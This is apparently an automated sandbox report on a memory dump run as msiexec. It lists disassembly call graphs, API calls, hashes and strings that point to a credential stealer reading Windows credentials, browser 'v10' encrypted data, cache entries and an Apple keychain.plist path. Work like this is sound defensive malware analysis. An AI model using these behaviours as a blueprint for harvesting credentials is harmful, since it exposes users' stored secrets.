                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoSystemmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3558857096-0
                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 41->40 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                          • API String ID: 2263259095-3798722523
                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                          • API String ID: 2744995895-28296030
                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                          • String ID: chp$v10
                                                                                                          • API String ID: 4290143792-2783969131
                                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 513 40e304-40e316 call 406e8f 511->513 517 40e476-40e483 call 406b53 513->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 513->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f free 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 554 40e3c3-40e3c6 551->554 552->553 555 40e416-40e427 memcpy 553->555 556 40e42a-40e42f 553->556 554->542 555->556 557 40e431-40e442 memcpy 556->557 558 40e445-40e44a 556->558 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                          • String ID: bhv
                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                          • API String ID: 2941347001-70141382
                                                                                                          • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                          • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
